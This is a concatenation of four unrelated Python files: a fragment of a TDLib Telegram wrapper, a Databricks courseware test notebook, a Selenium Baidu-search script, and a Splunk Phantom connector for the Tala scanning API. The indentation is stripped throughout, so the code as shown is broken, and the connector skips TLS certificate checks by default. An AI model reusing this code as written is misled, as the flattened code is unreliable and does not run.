handlers.update({callback: event})
@run_async
def ClassFactory(item):
def convert(item):
if isinstance(item, dict):
item = {k.replace('@extra', 'extra'): v for k, v in item.items()}
imp = __import__('bot.telegram.td_api', fromlist=[item['@type']])
klass = getattr(imp, item['@type'])
kwargs = {}
sig = inspect.signature(klass)
for k, v in sig.parameters.items():
_get = item.get(k, v.default)
if isinstance(_get, list):
_item = []
for x in _get:
_item.append(convert(x))
kwargs.update({k: _item})
else:
kwargs.update({k: convert(_get)})
return klass(**kwargs)
else:
return item
return convert(item)
def get_tdjon():
import os
if os.path.isfile('tdjson.so'):
return os.path.join(os.getcwd(), 'bot/telegram/tdjson.so')
elif os.path.isfile('tdjson.dll'):
return os.path.join(os.getcwd(), 'bot/telegram/tdjson.dll')
else:
return find_library('tdjson')
tdjson_path = get_tdjon()
if tdjson_path is None:
raise errors.LibraryNotFound('Can\'t find tdjson library', threads)
tdjson = CDLL(tdjson_path)
td_json_client_create = tdjson.td_json_client_create
td_json_client_create.restype = c_void_p
td_json_client_create.argtypes = []
td_json_client_receive = tdjson.td_json_client_receive
td_json_client_receive.restype = c_char_p
td_json_client_receive.argtypes = [c_void_p, c_double]
td_json_client_send = tdjson.td_json_client_send
td_json_client_send.restype = None
td_json_client_send.argtypes = [c_void_p, c_char_p]
td_json_client_execute = tdjson.td_json_client_execute
td_json_client_execute.restype = c_char_p
td_json_client_execute.argtypes = [c_void_p, c_char_p]
td_json_client_destroy = tdjson.td_json_client_destroy
td_json_client_destroy.restype = None
td_json_client_destroy.argtypes = [c_void_p]
fatal_error_callback_type = CFUNCTYPE(None, c_char_p)
td_set_log_fatal_error_callback = tdjson.td_set_log_fatal_error_callback
td_set_log_fatal_error_callback.restype = None
td_set_log_fatal_error_callback.argtypes = [fatal_error_callback_type]
def on_fatal_error_callback(error_message):
raise errors.TDlibFatalException(
'TDLib fatal error {error}:'.format(error=error_message))
def cast_to_json(obj):
if not isinstance(obj, dict):
_dict = obj.__dict__
_dict.update({'@type': obj.__tdlib_type__})
_dict.update({k.replace('_extra', '@extra'): v for k, v in _dict.items()})
else:
_dict = obj
return json.dumps(_dict)
def td_execute(query):
query = cast_to_json(query)
result = td_json_client_execute(None, query.encode('utf-8'))
if result:
result = json.loads(result.decode('utf-8'))
result = ClassFactory(result)
return result
def td_send(query):
query = cast_to_json(query)
td_json_client_send(client, query.encode('utf-8'))
def td_recieve():
result = td_json_client_receive(client, 1.0)
if result:
result = json.loads(result.decode())
return ClassFactory(result)
def td_send_and_receive(query):
td_send(query)
return td_recieve()
c_on_fatal_error_callback = fatal_error_callback_type(on_fatal_error_callback)
td_set_log_fatal_error_callback(c_on_fatal_error_callback)
td_execute(td_api.setLogVerbosityLevel(new_verbosity_level=0, extra=1.01234))
client = td_json_client_create()
|
# Databricks notebook source
# MAGIC
# MAGIC %md
# MAGIC # Class-Utility-Methods-Test
# MAGIC The purpose of this notebook is to facilitate testing of courseware-specific utility methods.
# COMMAND ----------
spark.conf.set("com.databricks.training.module-name", "common-notebooks")
# COMMAND ----------
# MAGIC %md
# MAGIC Many of these tests revolve around the current DBR version.
# MAGIC
# MAGIC It is assumed that the cluster is configured properly and that these tests are updated each time the courseware is published against a new DBR.
# COMMAND ----------
# MAGIC %run ./Class-Utility-Methods
# COMMAND ----------
def functionPassed(result):
if not result:
raise AssertionError("Test failed")
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getTags`
# COMMAND ----------
def testGetTags():
testTags = getTags()
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test that getTags returns correct type
testsPassed.append(None)
try:
from py4j.java_collections import JavaMap
assert isinstance(getTags(), JavaMap)
passedTest(True)
except:
passedTest(False, "The correct type is not returned by getTags")
# Test that getTags does not return an empty dict
testsPassed.append(None)
try:
assert len(testTags) > 0
passedTest(True)
except:
passedTest(False, "A non-empty dict is returned by getTags")
# Print final info and return
if all(testsPassed):
print('All {} tests for getTags passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getTags passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetTags())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getTag()`
# COMMAND ----------
def testGetTag():
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test that getTag returns null when defaultValue is not set and tag is not present
testsPassed.append(None)
try:
assert getTag("thiswillneverbeincluded") == None
passedTest(True)
except:
passedTest(False, "NoneType is not returned when defaultValue is not set and tag is not present for getTag")
# Test that getTag returns defaultValue when it is set and tag is not present
testsPassed.append(None)
try:
assert getTag("thiswillneverbeincluded", "default-value") == "default-value"
passedTest(True)
except:
passedTest(False, "defaultValue is not returned when defaultValue is set and tag is not present for getTag")
# Test that getTag returns correct value when default value is not set and tag is present
testsPassed.append(None)
try:
orgId = getTags()["orgId"]
assert isinstance(orgId, str)
assert len(orgId) > 0
assert orgId == getTag("orgId")
passedTest(True)
except:
passedTest(False, "A non-empty dict is returned by getTags")
# Print final info and return
if all(testsPassed):
print('All {} tests for getTag passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getTag passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetTag())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getDbrMajorAndMinorVersions()`
# COMMAND ----------
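# latestDbrMajor and latestDbrMinor are not defined in this notebook; they are expected to
# come from the %run of Class-Utility-Methods above, so this test pins the cluster's DBR
# version to the one the courseware was last published against.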
def testGetDbrMajorAndMinorVersions():
(major,minor) = getDbrMajorAndMinorVersions()
assert major == latestDbrMajor, f"Found {major}"
assert minor == latestDbrMinor, f"Found {minor}"
return True
functionPassed(testGetDbrMajorAndMinorVersions())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getPythonVersion()`
# COMMAND ----------
def testGetPythonVersion():
# Setup tests
testsPassed = []
def passedTest(result, message = None):
if result:
testsPassed[len(testsPassed) - 1] = True
else:
testsPassed[len(testsPassed) - 1] = False
print('Failed Test: {}'.format(message))
# Test output for structure
testsPassed.append(None)
try:
pythonVersion = getPythonVersion()
assert isinstance(pythonVersion, str)
assert len(pythonVersion.split(".")) >= 2
passedTest(True)
except:
passedTest(False, "pythonVersion does not match expected structure")
# Test output for correctness
testsPassed.append(None)
try:
pythonVersion = getPythonVersion()
assert pythonVersion[0] == "2" or pythonVersion[0] == "3"
passedTest(True)
except:
passedTest(False, "pythonVersion does not match expected value")
# Print final info and return
if all(testsPassed):
print('All {} tests for getPythonVersion passed'.format(len(testsPassed)))
return True
else:
raise Exception('{} of {} tests for getPythonVersion passed'.format(testsPassed.count(True), len(testsPassed)))
functionPassed(testGetPythonVersion())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getUsername()`
# COMMAND ----------
def testGetUsername():
username = getUsername()
assert isinstance(username, str)
assert username != ""
return True
functionPassed(testGetUsername())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `getUserhome`
# COMMAND ----------
def testGetUserhome():
userhome = getUserhome()
assert isinstance(userhome, str)
assert userhome != ""
assert userhome == "dbfs:/user/" + getUsername()
return True
functionPassed(testGetUserhome())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `assertDbrVersion`
# COMMAND ----------
def testAssertDbrVersion():
(majorVersion, minorVersion) = getDbrMajorAndMinorVersions()
major = int(majorVersion)
minor = int(minorVersion)
goodVersions = [
("PG1", major-1, minor-1),
("PG2", major-1, minor),
("PG3", major, minor-1),
("PG4", major, minor)
]
for (name, testMajor, testMinor) in goodVersions:
print(f"-- {name} {testMajor}.{testMinor}")
assertDbrVersion(None, testMajor, testMinor, False)
print(f"-"*80)
badVersions = [
("PB1", major+1, minor+1),
("PB2", major+1, minor),
("PB3", major, minor+1)
]
for (name, testMajor, testMinor) in badVersions:
try:
print(f"-- {name} {testMajor}.{testMinor}")
assertDbrVersion(None, testMajor, testMinor, False)
raise Exception("Expected AssertionError")
except AssertionError as e:
print(e)
print(f"-"*80)
return True
functionPassed(testAssertDbrVersion())
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `assertIsMlRuntime`
# COMMAND ----------
# def testAssertIsMlRuntime():
# assertIsMlRuntime("6.3.x-ml-scala2.11")
# assertIsMlRuntime("6.3.x-cpu-ml-scala2.11")
# try:
# assertIsMlRuntime("5.5.x-scala2.11")
# assert False, "Expected to throw an ValueError"
# except AssertionError:
# pass
# try:
# assertIsMlRuntime("5.5.xml-scala2.11")
# assert False, "Expected to throw an ValueError"
# except AssertionError:
# pass
# return True
# functionPassed(testAssertIsMlRuntime())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test Legacy Functions
# MAGIC
# MAGIC Note: Legacy functions will not be tested. Use at your own risk.
# COMMAND ----------
# MAGIC %md
# MAGIC
# MAGIC ## Test `createUserDatabase`
# COMMAND ----------
def testCreateUserDatabase():
courseType = "wa"
username = "mickey.mouse@disney.com"
moduleName = "Testing-Stuff 101"
lessonName = "TS 03 - Underwater Basket Weaving"
# Test that correct database name is returned
expectedDatabaseName = "mickey_mouse_disney_com" + "_" + "testing_stuff_101" + "_" + "ts_03_underwater_basket_weaving" + "_" + "p" + "wa"
databaseName = getDatabaseName(courseType, username, moduleName, lessonName)
assert databaseName == expectedDatabaseName, "Expected {}, found {}".format(expectedDatabaseName, databaseName)
actualDatabaseName = createUserDatabase(courseType, username, moduleName, lessonName)
assert actualDatabaseName == expectedDatabaseName, "Expected {}, found {}".format(expectedDatabaseName, databaseName)
assert spark.sql(f"SHOW DATABASES LIKE '{expectedDatabaseName}'").first()["databaseName"] == expectedDatabaseName
assert spark.sql("SELECT current_database()").first()["current_database()"] == expectedDatabaseName
return True
functionPassed(testCreateUserDatabase())
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `getExperimentId()`
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `classroomCleanup()`
# COMMAND ----------
classroomCleanup(daLogger, "sp", getUsername(), getModuleName(), getLessonName(), False)
# COMMAND ----------
classroomCleanup(daLogger, "il", getUsername(), getModuleName(), getLessonName(), True)
# COMMAND ----------
classroomCleanup(daLogger, "sp", getUsername(), getModuleName(), getLessonName(), False)
# COMMAND ----------
classroomCleanup(daLogger, "il", getUsername(), getModuleName(), getLessonName(), True)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test FILL_IN
# COMMAND ----------
print(FILL_IN)
print(FILL_IN.VALUE)
print(FILL_IN.LIST)
print(FILL_IN.SCHEMA)
print(FILL_IN.ROW)
print(FILL_IN.INT)
print(FILL_IN.DATAFRAME)
# COMMAND ----------
# MAGIC %md
# MAGIC ## Test `showStudentSurvey()`
# COMMAND ----------
html = renderStudentSurvey()
print(html)
# COMMAND ----------
showStudentSurvey()
# COMMAND ----------
|
from selenium import webdriver
import time
# driver = webdriver.Chrome(executable_path="./chromedriver.exe")  # the driver path can be passed in explicitly (one of two ways)
driver = webdriver.Chrome()  # open the browser; place chromedriver in the same directory as python so no executable path is needed
def openBaiDu(url, selector, keyword,pic):
driver.get(url)
if selector == 'kw':
driver.find_element_by_id(selector).send_keys(keyword)
else:
driver.find_element_by_name(selector).send_keys(keyword)
    driver.save_screenshot(pic)  # take a screenshot
openBaiDu('https://baidu.com','kw','王力宏','./baidu.png')  # absolute path
time.sleep(3)
driver.quit()  # quit the browser; driver.close() would only close the current tab
|
# File: tala_connector.py
#
# Copyright (c) 2018-2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
import datetime
import json
import os
import uuid
import phantom.app as phantom
import phantom.rules as ph_rules
# import shutil
import requests
from bs4 import BeautifulSoup
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
from phantom.vault import Vault
# Usage of the consts file is recommended
from tala_consts import *
class RetVal(tuple):
def __new__(cls, val1, val2=None):
return tuple.__new__(RetVal, (val1, val2))
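# RetVal is a small helper so that the REST helpers can always return a (status, data)
# pair, while calls that only produce a status can still be unpacked the same way.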
class TalaConnector(BaseConnector):
def __init__(self):
# Call the BaseConnectors init first
super(TalaConnector, self).__init__()
self._state = None
# Variable to hold a base_url in case the app makes REST calls
# Do note that the app json defines the asset config, so please
# modify this as you deem fit.
self._base_url = None
def _process_empty_reponse(self, response, action_result):
if response.status_code == 200:
return RetVal(phantom.APP_SUCCESS, {})
return RetVal(action_result.set_status(phantom.APP_ERROR, "Empty response and no information in the header"), None)
def _process_html_response(self, response, action_result):
# An html response, treat it like an error
status_code = response.status_code
try:
soup = BeautifulSoup(response.text, "html.parser")
# Remove the script, style, footer and navigation part from the HTML message
for element in soup(["script", "style", "footer", "nav"]):
element.extract()
error_text = soup.text
split_lines = error_text.split('\n')
split_lines = [x.strip() for x in split_lines if x.strip()]
error_text = '\n'.join(split_lines)
except Exception:
error_text = "Cannot parse error details"
if 200 <= status_code < 399:
return RetVal(phantom.APP_SUCCESS, json.loads(response.text))
message = "Status Code: {0}. Data from server:\n{1}\n".format(status_code,
error_text)
message = message.replace('{', '{{').replace('}', '}}')
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_json_response(self, r, action_result):
# Try a json parse
try:
resp_json = r.json()
except Exception as e:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Unable to parse JSON response. Error: {0}".format(
str(e))), None)
# Please specify the status codes here
if 200 <= r.status_code < 399:
return RetVal(phantom.APP_SUCCESS, resp_json)
# You should process the error returned in the json
message = "Error from server. Status Code: {0} Data from server: {1}".format(
r.status_code, r.text.replace('{', '{{').replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_response(self, r, action_result):
# store the r_text in debug data, it will get dumped in the logs if the action fails
if hasattr(action_result, 'add_debug_data'):
action_result.add_debug_data({'r_status_code': r.status_code})
action_result.add_debug_data({'r_text': r.text})
action_result.add_debug_data({'r_headers': r.headers})
# Process each 'Content-Type' of response separately
# Process a json response
if 'json' in r.headers.get('Content-Type', ''):
return self._process_json_response(r, action_result)
        # Process an HTML response. Do this no matter what the API claims to return:
        # there is a high chance of a proxy between Phantom and the rest of the world,
        # and in case of errors proxies return HTML, so this function parses the error
        # and adds it to the action_result.
if 'html' in r.headers.get('Content-Type', ''):
return self._process_html_response(r, action_result)
        # If the Content-Type is not one we parse, handle an empty response
if not r.text:
return self._process_empty_reponse(r, action_result)
# everything else is actually an error at this point
message = "Can't process response from server. Status Code: {0} Data from server: {1}".format(
r.status_code, r.text.replace('{', '{{').replace('}', '}}'))
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _make_rest_call(self, endpoint, action_result, headers=None, params=None, json=None, data=None, method="get"):
config = self.get_config()
resp_json = None
try:
request_func = getattr(requests, method)
except AttributeError:
return RetVal(action_result.set_status(phantom.APP_ERROR, "Invalid method: {0}".format(method)), resp_json)
# Create a URL to connect to
url = self._base_url + endpoint
try:
r = request_func(
url,
json=json,
data=data,
headers=headers,
verify=config.get('verify_server_cert', False),
params=params)
except Exception as e:
return RetVal(action_result.set_status( phantom.APP_ERROR, "Error Connecting to server. Details: {0}".format(
str(e))), resp_json)
return self._process_response(r, action_result)
def _download_file_to_vault(self, action_result, endpoint, json, file_name):
""" Download a file and add it to the vault """
url = self._base_url + endpoint
try:
r = requests.post( # nosemgrep
str(url),
json=json,
headers={ 'Content-Type': 'application/json' }
)
except Exception as e:
return action_result.set_status(phantom.APP_ERROR, "{}".format(str(e)))
if hasattr(Vault, 'get_vault_tmp_dir'):
try:
success, message, new_vault_id = ph_rules.vault_add(
container=self.get_container_id(),
file_location=r.content,
file_name=file_name
)
except Exception as e:
return action_result.set_status(phantom.APP_ERROR, "Could not add file to vault: {0}".format(e))
else:
guid = uuid.uuid4()
tmp_dir = "/vault/tmp/{}".format(guid)
zip_path = "{}/{}".format(tmp_dir, file_name)
try:
os.makedirs(tmp_dir)
except Exception as e:
msg = "Unable to create temporary folder '{}': ".format(tmp_dir)
return action_result.set_status(phantom.APP_ERROR, msg, e)
with open(zip_path, 'wb') as f:
f.write(r.content)
f.close()
vault_path = "{}/{}".format(tmp_dir, file_name)
success, message, new_vault_id = ph_rules.vault_add(
container=self.get_container_id(),
file_location=vault_path,
file_name=file_name
)
if success:
action_result.set_status(phantom.APP_SUCCESS, "Transferred file")
# Check if file with same file name and size is available in vault and save only if it is not available
try:
_, _, data = ph_rules.vault_info(container_id=self.get_container_id(), vault_id=new_vault_id, file_name=file_name)
data = list(data)[0]
file_size = data.get('size')
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Error: failed to find vault ID: {}".format(new_vault_id))
action_result.add_data({
phantom.APP_JSON_VAULT_ID: new_vault_id,
phantom.APP_JSON_NAME: file_name,
phantom.APP_JSON_SIZE: file_size
})
action_result.set_status(phantom.APP_SUCCESS, "Successfully added file to vault")
else:
action_result.set_status(phantom.APP_ERROR, "Error adding file to vault")
return action_result.get_status()
def _handle_test_connectivity(self, param):
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
# NOTE: test connectivity does _NOT_ take any parameters
# i.e. the param dictionary passed to this handler will be empty.
# Also typically it does not add any data into an action_result either.
# The status and progress messages are more important.
headers = { 'auth-token': self._auth_token }
self.save_progress("Connecting to endpoint /project to test connectivity")
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=None, headers=headers)
if phantom.is_fail(ret_val):
self.save_progress("Test Connectivity Failed")
return action_result.get_status()
# Return success
self.save_progress("Test Connectivity Passed")
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_create_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
name = param['name']
url = param['url']
request = {
"auth-token": self._auth_token,
"name": name,
"url": url
}
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['project_id'] = response['id']
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
param = { 'ids': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=param, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data = dict()
for item in response:
data.update(item)
# Get project settings (triggered or manual)
params = { 'id': project_id }
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
# Get status (status and scan id for all projects)
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=headers, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
for item in response:
if int(item['project-id']) == project_id:
data.update(item['latest-scan-status'])
break
# Add the response into the data section
action_result.add_data(data)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_PROJECT_SUCC)
def _handle_list_projects(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data = dict()
for item in response:
data.update({ item['id']: item })
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['num_projects'] = len(response)
# Get project settings (triggered or manual)
for project_id in data:
params = { 'id': int(project_id) }
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
data[int(project_id)].update(response)
# Get status (status and scan id for all projects)
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=headers, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
for item in response:
data[int(item['project-id'])].update(item['latest-scan-status'])
# Add the response into the data section
for item in data:
action_result.add_data(data[item])
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_update_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
name = param.get('name', '')
url = param.get('url', '')
automation_mode = param.get('automation_mode')
data = dict()
if name or url:
request = {
"auth-token": self._auth_token,
"id": project_id
}
if name:
request["name"] = name
if url:
request["url"] = url
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, json=request, method='put')
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
if automation_mode:
settings_request = {
'auth-token': self._auth_token,
'automation-mode': automation_mode,
'project-id': project_id
}
# make rest call
ret_val, response = self._make_rest_call('/project/settings', action_result, json=settings_request, method='put')
if phantom.is_fail(ret_val):
return action_result.get_status()
data.update(response)
if not name and not url and not automation_mode:
return action_result.set_status(phantom.APP_ERROR, TALA_UPDATE_PROJECT_ERR)
# Add the response into the data section
action_result.add_data(data)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_UPDATE_PROJECT_SUCC)
def _handle_delete_project(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
params = { 'id': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/project', action_result, params=params, headers=headers, method='delete')
if phantom.is_fail(ret_val):
message = action_result.get_message()
if 'project not found' in message.lower():
return action_result.set_status(phantom.APP_SUCCESS, TALA_ALREADY_DELETED_PROJECT_SUCC)
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_DELETE_PROJECT_SUCC)
def _handle_create_scan(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_ids = param.get('project_ids', None)
try:
project_ids_list = [int(x) for x in project_ids.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
request = {
"auth-token": self._auth_token,
"projectIDs": project_ids_list
}
# make rest call
ret_val, response = self._make_rest_call('/scan', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
for item in response['scan-initiation-status']:
data = {"project-id": item}
data.update(response['scan-initiation-status'][item])
action_result.add_data(data)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['message'] = response['message']
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_scan_setting(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
params = { 'project-id': project_id }
headers = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/scan/settings', action_result, params=params, headers=headers)
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_SCAN_SETTINGS_SUCC)
def _handle_get_status(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
request = { 'auth-token': self._auth_token }
# make rest call
ret_val, response = self._make_rest_call('/scan/status', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
for item in response:
action_result.add_data(item)
# Add a dictionary that is made up of the most important values from data into the summary
summary = action_result.update_summary({})
summary['num_projects'] = len(response)
# Return success, no need to set the message, only the status
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS)
def _handle_get_summary(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_id']
request = {
'auth-token': self._auth_token,
'projectID': project_id
}
# make rest call
ret_val, response = self._make_rest_call('/scan/summary', action_result, json=request, method='post')
if phantom.is_fail(ret_val):
return action_result.get_status()
# Add the response into the data section
action_result.add_data(response)
# Return success status with appropriate message
# BaseConnector will create a textual message based off of the summary dictionary
return action_result.set_status(phantom.APP_SUCCESS, TALA_GET_SUMMARY_SUCC)
def _handle_download_policy_bundle(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
project_id = param['project_ids']
try:
[int(x) for x in project_id.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
tracking_id = str(param['tracking_id'])
server_conf = param.get('server_conf', None) # If user wants to download everything, provide server_conf
request = {
'auth-token': self._auth_token,
'project': project_id,
'tracking-id': tracking_id
}
file_name = "tala_AIM_bundle_ids{}_{}.zip".format(project_id.replace(',', '-'), tracking_id)
# call /bundle - download AIM policy bundle
ret_val = self._download_file_to_vault(action_result, '/bundle', json=request, file_name=file_name)
if phantom.is_fail(ret_val):
return self.set_status(phantom.APP_ERROR)
if server_conf:
request = {
"auth-token": self._auth_token,
"serverconf": server_conf
}
file_name = "tala_enforcement_module_{}.zip".format(server_conf)
# call /deploy - download web server injection module, template matching library, AIM policy
ret_val = self._download_file_to_vault(action_result, '/deploy', json=request, file_name=file_name)
if phantom.is_fail(ret_val):
return self.set_status(phantom.APP_ERROR)
# Return success status with appropriate message
return self.set_status(phantom.APP_SUCCESS, TALA_DOWNLOAD_POLICY_BUNDLE_SUCC)
def _handle_synchronize_projects(self, param):
# Implement the handler here
# use self.save_progress(...) to send progress messages back to the platform
self.save_progress("In action handler for: {0}".format(self.get_action_identifier()))
# Add an action result object to self (BaseConnector) to represent the action for this param
action_result = self.add_action_result(ActionResult(dict(param)))
scan_id = param['scan_id']
project_ids = param['project_ids']
try:
project_ids_formatted = [int(x) for x in project_ids.split(",")]
except Exception:
return action_result.set_status(phantom.APP_ERROR, "Valid project id(s) required")
request = {
"auth-token": self._auth_token,
"projects": [
{
"scan-id": scan_id,
"ts": str(datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
}
],
"projectIDs": project_ids_formatted
}
file_name = "tala_bundle_ids{}_{}.zip".format(project_ids.replace(',', '-'), scan_id)
# make rest call
return self._download_file_to_vault(action_result, '/sync', json=request, file_name=file_name)
def handle_action(self, param):
ret_val = phantom.APP_SUCCESS
# Get the action that we are supposed to execute for this App Run
action_id = self.get_action_identifier()
self.debug_print("action_id", self.get_action_identifier())
if action_id == 'test_connectivity':
ret_val = self._handle_test_connectivity(param)
elif action_id == 'create_project':
ret_val = self._handle_create_project(param)
elif action_id == 'get_project':
ret_val = self._handle_get_project(param)
elif action_id == 'list_projects':
ret_val = self._handle_list_projects(param)
elif action_id == 'update_project':
ret_val = self._handle_update_project(param)
elif action_id == 'delete_project':
ret_val = self._handle_delete_project(param)
elif action_id == 'create_scan':
ret_val = self._handle_create_scan(param)
elif action_id == 'get_scan_setting':
ret_val = self._handle_get_scan_setting(param)
elif action_id == 'get_status':
ret_val = self._handle_get_status(param)
elif action_id == 'get_summary':
ret_val = self._handle_get_summary(param)
elif action_id == 'download_policy_bundle':
ret_val = self._handle_download_policy_bundle(param)
elif action_id == 'synchronize_projects':
ret_val = self._handle_synchronize_projects(param)
return ret_val
def initialize(self):
# Load the state in initialize, use it to store data
# that needs to be accessed across actions
self._state = self.load_state()
# get the asset config
config = self.get_config()
self._base_url = config.get('base_url').rstrip('/')
self._auth_token = config.get('auth_token')
return phantom.APP_SUCCESS
def finalize(self):
        # Save the state; this data is saved across actions and app upgrades
self.save_state(self._state)
